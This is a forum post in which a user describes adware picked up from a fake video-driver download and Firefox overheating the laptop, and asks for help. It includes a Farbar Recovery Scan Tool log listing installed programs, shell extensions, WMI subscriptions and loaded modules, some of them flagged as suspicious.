
Please check my FRST log

#1 Post by Jomko

Please help. I wanted to install some video drivers, and instead of drivers I installed some kind of pest; the notebook started slowing down, Firefox kept opening by itself, and nothing but ad windows kept opening, and so on. I decided to step in "expertly", so I ran ComboFix, and it did sort out some things, but one problem remains: whenever Firefox is running, the notebook is constantly working and overheating even when I am doing nothing.

Thanks in advance



Additional scan result of Farbar Recovery Scan Tool (x64) Version: 02-02-2020 02
Ran by Jomko (06-02-2020 21:29:55)
Running from C:\Users\Jomko\Desktop
Windows 7 Professional Service Pack 1 (X64) (2018-01-07 16:45:09)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1214245489-2610092731-2950206201-500 - Administrator - Disabled)
Guest (S-1-5-21-1214245489-2610092731-2950206201-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1214245489-2610092731-2950206201-1002 - Limited - Enabled)
Jomko (S-1-5-21-1214245489-2610092731-2950206201-1000 - Administrator - Enabled) => C:\Users\Jomko

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-0011-0000-0000-0000000FF1CE}_PROPLUS_{BEE75E01-DD3F-4D5F-B96C-609E6538D419}) (Version: - Microsoft)
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-0015-041B-0000-0000000FF1CE}_PROPLUS_{B1A00287-698E-48D0-8C8F-A3387C2B8C45}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-0016-041B-0000-0000000FF1CE}_PROPLUS_{B1A00287-698E-48D0-8C8F-A3387C2B8C45}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-0018-041B-0000-0000000FF1CE}_PROPLUS_{B1A00287-698E-48D0-8C8F-A3387C2B8C45}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-0019-041B-0000-0000000FF1CE}_PROPLUS_{B1A00287-698E-48D0-8C8F-A3387C2B8C45}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-001A-041B-0000-0000000FF1CE}_PROPLUS_{B1A00287-698E-48D0-8C8F-A3387C2B8C45}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-001B-041B-0000-0000000FF1CE}_PROPLUS_{B1A00287-698E-48D0-8C8F-A3387C2B8C45}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-001F-0405-0000-0000000FF1CE}_PROPLUS_{3C3813E1-C370-4F32-9639-8B43C7C780CD}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-001F-0407-0000-0000000FF1CE}_PROPLUS_{2AB528A5-BB1B-4EBE-8E51-AD0C4CD33CA9}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-001F-0409-0000-0000000FF1CE}_PROPLUS_{3EC77D26-799B-4CD8-914F-C1565E796173}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-001F-040E-0000-0000000FF1CE}_PROPLUS_{685D17E5-D868-4A77-B58E-255DEBA78262}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-001F-041B-0000-0000000FF1CE}_PROPLUS_{F67648A4-713E-4298-BBAD-A83D8283B0F3}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-002A-0000-1000-0000000FF1CE}_PROPLUS_{00C5525B-3CB3-467D-8100-2E6FB306CD86}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-002A-041B-1000-0000000FF1CE}_PROPLUS_{FE295FA2-72FC-4859-85B3-0E6685DB13A4}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-0044-041B-0000-0000000FF1CE}_PROPLUS_{B1A00287-698E-48D0-8C8F-A3387C2B8C45}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-006E-041B-0000-0000000FF1CE}_PROPLUS_{FE295FA2-72FC-4859-85B3-0E6685DB13A4}) (Version: - Microsoft) Hidden
7-Zip 16.04 (x64) (HKLM\...\7-Zip) (Version: 16.04 - Igor Pavlov)
Adobe Acrobat Reader DC - Slovak (HKLM-x32\...\{AC76BA86-7AD7-1051-7B44-AC0F074E4100}) (Version: 19.021.20061 - Adobe Systems Incorporated)
Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.321 - Adobe)
Aktualizácie NVIDIA 2.13.0.21 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 2.13.0.21 - NVIDIA Corporation)
ANT Drivers Installer x64 (HKLM\...\{C14C3A1D-B5B3-41BB-9358-6FEA3FC642AF}) (Version: 2.3.4 - Garmin Ltd or its subsidiaries) Hidden
AOMEI Partition Assistant Standard Edition 6.6 (HKLM-x32\...\{02F850ED-FD0E-4ED1-BE0B-54981f5BD3D4}_is1) (Version: - AOMEI Technology Co., Ltd.)
Apple Mobile Device Support (HKLM\...\{6CECF0FB-EE71-4FE5-8AE0-FA007408934A}) (Version: 13.0.0.38 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{A30EA700-5515-48F0-88B0-9E99DC356B88}) (Version: 2.6.0.1 - Apple Inc.)
Ashampoo PDF Pro (HKLM-x32\...\{0A11EA01-9906-0D0E-7868-3381FE134510}_is1) (Version: 1.0.7 - Ashampoo GmbH & Co. KG)
Bitvise SSH Client - FlowSshNet (x64) (HKLM\...\{0F4F44AB-C022-466B-9836-8EB4344E481F}) (Version: 8.38.0.0 - Bitvise Limited) Hidden
Bitvise SSH Client - FlowSshNet (x86) (HKLM-x32\...\{F9932D09-05BF-4FB8-B748-094EC2B3FC1F}) (Version: 8.38.0.0 - Bitvise Limited) Hidden
Bitvise SSH Client 8.38 (remove only) (HKLM-x32\...\BvSshClient) (Version: 8.38 - Bitvise Limited)
Bluetooth Win7 Suite (64) (HKLM\...\{230D1595-57DA-4933-8C4E-375797EBB7E1}) (Version: 7.4.0.96 - Meno vašej spoločnosti)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
CloudNet (HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\...\CloudNet) (Version: 20170301 - EpicNet Inc.) <==== ATTENTION
Elevated Installer (HKLM-x32\...\{B11981DA-5AEA-459F-978A-F99541F77AD5}) (Version: 6.15.0.0 - Garmin Ltd or its subsidiaries) Hidden
FileZilla Client 3.46.3 (HKLM-x32\...\FileZilla Client) (Version: 3.46.3 - Tim Kosse)
Free FLAC to MP3 Converter 1.4 (HKLM-x32\...\{A54C01BD-1277-4722-B42B-EC9800A90B1E}_is1) (Version: 1.4 - PolySoft Solutions)
Free ZIP Password Recovery (HKLM-x32\...\{AF4ED478-C15D-4D4D-95E4-70C15F963729}) (Version: 3.70.69 - KRyLack Software)
Garmin Express (HKLM-x32\...\{4cc2749e-1c2a-4f48-abdf-c17069bac4da}) (Version: 6.15.0.0 - Garmin Ltd or its subsidiaries)
Garmin Express (HKLM-x32\...\{9BE7B09F-C8D2-4B1E-B83E-7387FDDA8BCD}) (Version: 6.15.0.0 - Garmin Ltd or its subsidiaries) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 79.0.3945.130 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.35.441 - Google LLC) Hidden
Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.21.169 - Google Inc.) Hidden
Hard Disk Low Level Format Tool 4.40 (HKLM-x32\...\Hard Disk Low Level Format Tool_is1) (Version: - HDDGURU)
HP Dropbox Plugin (HKLM-x32\...\{9646F2DC-B09E-4314-92EC-B3332900A7EE}) (Version: 36.0.191.0 - HP)
HP EmailSMTP Plugin (HKLM-x32\...\{AF9F1F16-F6B4-4A66-B789-9F00B40B08AF}) (Version: 43.0.191.0 - HP)
HP FTP Plugin (HKLM-x32\...\{7DB5EDF6-8009-4E01-AF0D-4F3E02A0287F}) (Version: 43.0.191.0 - HP)
HP Google Drive Plugin (HKLM-x32\...\{07F30E12-A85F-4EA4-A5B3-3728FAB947ED}) (Version: 36.0.191.0 - HP)
HP LaserJet MFP M28-M31 Basic Device Software (HKLM\...\{08644094-D714-4B6E-9CEB-11433F5CBDB7}) (Version: 46.2.2636.18185 - HP Inc.)
HP LaserJet MFP M28-M31 Help (HKLM-x32\...\{0DF6621D-67C2-4E12-A5CF-260E985B8743}) (Version: 0.00.0005 - HP)
HP OneDrive Plugin (HKLM-x32\...\{8ED0A60F-9F44-4B7F-9C88-CC9E0B362628}) (Version: 36.0.191.0 - HP)
HP SFTP Plugin (HKLM-x32\...\{1F0191BF-E339-4192-85D9-C369CA3FE9F1}) (Version: 43.0.191.0 - HP)
HP SharePoint Plugin (HKLM-x32\...\{96DB7179-0B69-45E1-A109-3A3A1F5BBCDF}) (Version: 43.0.191.0 - HP)
I.R.I.S OCR (HKLM-x32\...\{3913CCF7-436B-4A7A-A265-62E9FFDD03D9}) (Version: 15.2.10.1114 - HP Inc.)
iCloud (HKLM\...\{28ABC5D7-AF47-4476-A6AA-C2DD822ED40F}) (Version: 7.9.0.9 - Apple Inc.)
ID3 Tag Editor (HKLM-x32\...\{671DC096-9262-4943-A3D8-ED8A757B60D5}_is1) (Version: - id3tageditor.com)
Inside (HKLM-x32\...\{9BD4503F-F711-491D-984A-AB4ABD66B8C2}_is1) (Version: - Playdead)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.14.5067 - Intel Corporation)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.0.0.102 - Intel Corporation)
Intel(R) Wireless Bluetooth(R) (HKLM\...\{00000070-0190-4FD1-8F3D-148929CC1385}) (Version: 19.70.0 - Intel Corporation)
Intel® PROSet/Wireless Software (HKLM-x32\...\{6da487a6-c50d-494e-aaa0-6d8ce9c37ef3}) (Version: 20.10.2 - Intel Corporation)
IrfanView (remove only) (HKLM-x32\...\IrfanView) (Version: 4.42 - Irfan Skiljan)
iRoot (HKLM-x32\...\{1295E43F-382A-4CB2-9E0F-079C0D7401BB}_is1) (Version: 1.8.9.21144 - SING)
iTunes (HKLM\...\{8F087FFD-35AC-4707-8565-58E5619CBF18}) (Version: 12.10.0.7 - Apple Inc.)
Java 8 Update 241 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180241F0}) (Version: 8.0.2410.7 - Oracle Corporation)
JDownloader 2 (HKLM-x32\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Kodi (HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\...\Kodi) (Version: - XBMC Foundation)
Logitech Options (HKLM\...\LogiOptions) (Version: 8.10.84 - Logitech)
Master PDF Editor 3.6 (HKLM\...\Master PDF Editor 3_is1) (Version: 3.6.30 - Code Industry Ltd.)
Microsoft .NET Framework 4.8 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.8.03761 - Microsoft Corporation)
Microsoft Office Professional Plus 2007 (HKLM-x32\...\PROPLUS) (Version: 12.0.6215.1000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.16.27012 (HKLM-x32\...\{427ada59-85e7-4bc8-b8d5-ebf59db60423}) (Version: 14.16.27012.6 - Microsoft Corporation)
Miro Video Converter (HKLM-x32\...\Miro Video Converter) (Version: 0.8.0 - Participatory Culture Foundation)
Mozilla Firefox 72.0.2 (x64 sk) (HKLM\...\Mozilla Firefox 72.0.2 (x64 sk)) (Version: 72.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 57.0.4 - Mozilla)
MPC-HC 1.7.13 (64-bit) (HKLM\...\{2ACBF1FA-F5C3-4B19-A774-B22A31F231B9}_is1) (Version: 1.7.13 - MPC-HC Team)
NeoDownloader 2.9.5 (HKLM-x32\...\{E76CDDCE-EFC0-4FE5-9972-9489CE49AA55}_is1) (Version: 2.9.5 - Neowise Software)
NVIDIA Grafický ovládač 419.72 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 419.72 - NVIDIA Corporation)
NVIDIA Softvér systému s podporou technológie PhysX 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation)
OpenOffice 4.1.5 (HKLM-x32\...\{E177AC33-EC9C-4537-8996-37ED331D9227}) (Version: 4.15.9789 - Apache Software Foundation)
Ovládací panel NVIDIA 419.72 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.ControlPanel) (Version: 419.72 - NVIDIA Corporation) Hidden
Podpora Apple aplikácií (32-bit) (HKLM-x32\...\{FD52A2FF-4D16-49C4-A2CD-DAC752C18BA2}) (Version: 8.0 - Apple Inc.)
Podpora Apple aplikácií(64-bit) (HKLM\...\{9B061D60-4E2C-4987-BFFD-423E3D477660}) (Version: 8.0 - Apple Inc.)
Product Improvement Study for HP LaserJet MFP M28-M31 (HKLM\...\{B50C256D-80E2-473E-9546-0410162F44D5}) (Version: 46.2.2636.18185 - HP Inc.)
PSPad editor (HKLM-x32\...\PSPad editor_is1) (Version: 4.6.2.2750 - Jan Fiala)
qTox (HKLM-x32\...\qTox) (Version: 1.13.0 - The qTox Project)
SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.3.1500.0 - SAMSUNG Electronics Co., Ltd.)
SoftEther VPN Client (HKLM\...\softether_sevpnclient) (Version: 4.29.9680 - SoftEther VPN Project)
SpeedFan (remove only) (HKLM-x32\...\SpeedFan) (Version: - )
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 17.0.10.51 - Synaptics Incorporated)
Total Commander 64-bit (Remove or Repair) (HKLM\...\Totalcmd64) (Version: 9.0 - Ghisler Software GmbH)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.8 - VideoLAN)
Win32DiskImager version 1.0.0 (HKLM-x32\...\{3DFFA293-DF2C-4B23-92E5-3433BDC310E1}}_is1) (Version: 1.0.0 - ImageWriter Developers)
WinCDEmu (HKLM-x32\...\WinCDEmu) (Version: 4.1 - Sysprogs)
Windows Driver Package - Dynastream Innovations, Inc. ANT LibUSB Drivers (04/11/2012 1.2.40.201) (HKLM\...\F9D2A789F9CFF8CEC36B544F53877C80F1F73C46) (Version: 04/11/2012 1.2.40.201 - Dynastream Innovations, Inc.)
Windows Driver Package - Silicon Labs Software (DSI_SiUSBXp_3_1) USB (02/06/2007 3.1) (HKLM\...\D1506E0025B5A3F9EB8270FE81C1EEDD9388B8A2) (Version: 02/06/2007 3.1 - Silicon Labs Software)
WinRAR 5.50 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.50.0 - win.rar GmbH)
XnView 2.39 (HKLM-x32\...\XnView_is1) (Version: 2.39 - Gougelet Pierre-e)

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1214245489-2610092731-2950206201-1000_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\Windows\system32\igfxEM.exe (Intel Corporation -> Intel Corporation)
CustomCLSID: HKU\S-1-5-21-1214245489-2610092731-2950206201-1000_Classes\CLSID\{ED90173A-3B4C-4E7E-B9CF-79714425D4B5}\InprocServer32 -> C:\Program Files (x86)\PSPad editor\pspshellx64.dll () [File not signed]
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers1: [Atheros] -> {B8952421-0E55-400B-94A6-FA858FC0A39F} => C:\Program Files (x86)\Bluetooth Suite\BtvAppExt.dll [2011-09-16] (Atheros Communications Inc. -> Atheros Commnucations) [File not signed]
ContextMenuHandlers1: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers1: [PhotoStreamsExt] -> {89D984B3-813B-406A-8298-118AFA3A22AE} => C:\Program Files\Common Files\Apple\Internet Services\ShellStreams64.dll [2018-12-03] (Apple Inc. -> Apple Inc.)
ContextMenuHandlers1: [WinCDEmu] -> {D0E37FD2-F675-426F-B09A-2CF37BA46FD5} => C:\Program Files (x86)\WinCDEmu\x64\WinCDEmuContextMenu.dll [2015-09-28] (Sysprogs OU) [File not signed]
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1: [WondershareVideoConverterFileOpreation] -> {FEB746CA-95C2-485F-B386-C30D4E56D22E} => C:\Windows\SysWOW64\WSCM64.dll -> No File
ContextMenuHandlers2: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers2: [WinCDEmu] -> {A9901FCD-B4DF-43A1-BD5D-6C9F88679497} => C:\Program Files (x86)\WinCDEmu\x64\WinCDEmuContextMenu.dll [2015-09-28] (Sysprogs OU) [File not signed]
ContextMenuHandlers3: [FTShellContext] -> {AFF81F7B-6942-40c4-AADA-7214EF7B6DD1} => C:\Program Files (x86)\Bluetooth Suite\ShellContextExt.dll [2011-09-16] (Atheros Communications Inc. -> Atheros Commnucations) [File not signed]
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\Windows\system32\igfxDTCM.dll [2019-07-12] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2019-03-18] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers6: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
ContextMenuHandlers6: [WinCDEmu] -> {A9901FCD-B4DF-43A1-BD5D-6C9F88679497} => C:\Program Files (x86)\WinCDEmu\x64\WinCDEmuContextMenu.dll [2015-09-28] (Sysprogs OU) [File not signed]
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1_S-1-5-21-1214245489-2610092731-2950206201-1000: [EditWithPSPad] -> {ED90173A-3B4C-4E7E-B9CF-79714425D4B5} => C:\Program Files (x86)\PSPad editor\pspshellx64.dll [2014-11-02] () [File not signed]

==================== Codecs (Whitelisted) ====================

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)

WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]

==================== Loaded Modules (Whitelisted) =============

2018-01-08 18:39 - 2014-11-02 18:45 - 000029184 _____ () [File not signed] C:\Program Files (x86)\PSPad editor\pspshellx64.dll
2019-10-21 13:56 - 2019-10-21 13:56 - 000144896 _____ () [File not signed] C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\laclient\libssh2.dll
2019-10-21 13:56 - 2019-10-21 13:56 - 000077824 _____ () [File not signed] C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\laclient\zlib.dll
2011-09-16 14:52 - 2011-09-16 14:52 - 000053920 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\AthCopyHook.dll
2011-09-16 14:53 - 2011-09-16 14:53 - 000020128 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\athr_debug.dll
2011-09-16 14:54 - 2011-09-16 14:54 - 000040608 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\BPP.DLL
2011-09-16 14:55 - 2011-09-16 14:55 - 000045216 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\BTBIP.DLL
2011-09-16 14:55 - 2011-09-16 14:55 - 000161440 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\BtvAppExt.dll
2011-09-16 15:02 - 2011-09-16 15:02 - 000504480 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\filetransfer.dll
2011-09-16 15:02 - 2011-09-16 15:02 - 000092832 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\gatts.DLL
2011-09-16 15:03 - 2011-09-16 15:03 - 000106144 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\GOEP.DLL
2011-09-16 15:03 - 2011-09-16 15:03 - 000080032 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\Handsfree.dll
2011-09-16 15:04 - 2011-09-16 15:04 - 000093856 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\L2capLib.dll
2011-09-16 15:06 - 2011-09-16 15:06 - 000310432 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\ObjPush.dll
2011-09-16 15:06 - 2011-09-16 15:06 - 004974752 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\OutLookLib.dll
2011-09-16 15:07 - 2011-09-16 15:07 - 000073888 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\PhoneBook.DLL
2011-09-16 15:07 - 2011-09-16 15:07 - 000065184 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\RfcommLib.dll
2011-09-16 15:08 - 2011-09-16 15:08 - 000109216 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\sesmgr.dll
2011-09-16 15:08 - 2011-09-16 15:08 - 000284320 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\ShellContextExt.dll
2011-09-16 15:08 - 2011-09-16 15:08 - 000041632 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\sim.DLL
2011-09-16 15:08 - 2011-09-16 15:08 - 000129184 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\skypeagent.dll
2011-09-16 15:09 - 2011-09-16 15:09 - 000061088 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\Sync.dll
2011-09-16 15:09 - 2011-09-16 15:09 - 000030368 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\utils.DLL
2018-02-15 20:11 - 2016-03-21 23:15 - 000027648 _____ (Copyright (c) Code Industry Ltd ) [File not signed] C:\Windows\System32\mpelocalmon.dll
2018-01-09 21:13 - 2016-10-04 15:51 - 000076800 _____ (Igor Pavlov) [File not signed] C:\Program Files\7-Zip\7-zip.dll
2018-01-11 15:12 - 2013-04-11 11:10 - 000073728 _____ (Intel Corporation) [File not signed] C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.dll
2019-04-02 17:10 - 2015-02-27 09:35 - 000489984 _____ (Newtonsoft) [File not signed] C:\Program Files (x86)\Wondershare\WAF\2.4.2.223\Newtonsoft.Json.dll
2017-02-12 01:28 - 2015-09-28 19:08 - 000255488 _____ (Sysprogs OU) [File not signed] C:\Program Files (x86)\WinCDEmu\x64\WinCDEmuContextMenu.dll
2019-10-21 13:56 - 2019-10-21 13:56 - 000355840 _____ (The cURL library, hxxp://curl.haxx.se/) [File not signed] C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\laclient\LIBCURL.dll
